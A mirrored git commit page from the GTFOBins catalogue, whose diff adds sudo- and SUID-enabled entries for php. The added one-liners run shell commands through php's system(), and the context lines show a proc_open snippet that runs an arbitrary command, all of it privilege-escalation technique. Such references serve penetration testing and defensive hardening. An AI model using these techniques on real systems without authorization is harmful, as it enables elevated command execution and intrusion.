mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
Add sudo and suid to php
This commit is contained in:
parent
4ea28f8c48
commit
0047d8bfb7
@ -19,6 +19,14 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
export CMD="ls /"
|
export CMD="ls /"
|
||||||
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
|
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
CMD="id"
|
||||||
|
sudo php -r "system('$CMD');"
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
CMD="id"
|
||||||
|
./php -r "system('$CMD');"
|
||||||
upload:
|
upload:
|
||||||
- description: Serve files in the local folder running an HTTP server.
|
- description: Serve files in the local folder running an HTTP server.
|
||||||
code: |
|
code: |
|
||||||
|
Loading…
Reference in New Issue
Block a user